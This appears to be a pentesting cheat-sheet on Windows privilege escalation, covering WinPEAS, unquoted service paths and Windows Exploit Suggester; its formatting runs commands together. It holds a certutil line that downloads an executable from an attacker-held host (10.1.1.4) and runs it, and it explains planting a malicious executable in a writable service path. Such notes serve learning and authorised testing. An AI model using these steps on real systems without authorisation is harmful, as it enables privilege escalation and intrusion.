Automated Tools
WinPEAS
Transfer winpeas via http
python3 -m http.server 80certutil -urlcache -f <http://10.1.1.4/winpeas.exe> winpeas.exe
.\\winpeas.exeWhat To Look For
Applications/Services that are running as Admin and are unquoted and has spaces.
An unquoted service means it is vulnerable to malicious executable being injected to the directory
Example:
“C:\\Program Files (x86)\\Wise\\Wise Care 365\\BootTime.exe”- QuotedC:\\Program Files (x86)\\Wise\\Wise Care 365\\BootTime.exe- Unquoted
Windows will try to check for exe for every word on the directory before the space
C:\Progam.exe
C:\Program Files.exe
C:\Program Files (x86)\Wise\Wise.exe
C:\Program Files (x86)\Wise\Wise Care.exe
We can use that vulnerability to insert a malicious executable file on the directory where we have write access such as
C:\\Program Files (x86)\\Wise\\
Setting up Windows Exploit Suggester
Gather System Info from the Target machine and save it to a file
systeminfoDownload Windows Exploit Suggester
Update the Database
./windows-exploit-suggester.py --updateInstall Dependencies
pip install xlrd --upgradecurl <https://bootstrap.pypa.io/get-pip.py> -o get-pip.py; python get-pip.pyRun Windows Exploit Suggester with the Systeminfo
./windows-exploit-suggester.py --database <XLSX_FILE> --systeminfo <SYSTEMINFO_FILE>Last updated



